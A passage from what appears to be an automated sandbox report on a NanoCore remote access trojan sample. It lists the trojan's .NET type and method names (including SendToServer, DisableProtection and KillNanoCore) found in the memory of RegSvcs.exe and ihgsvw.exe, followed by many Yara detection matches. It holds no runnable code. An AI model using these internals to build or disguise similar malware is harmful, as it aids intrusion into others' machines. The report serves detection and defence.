ervicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: ihgsvw.exe, 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttrib
uteSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyge
t_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttrib
uteSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyge
t_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
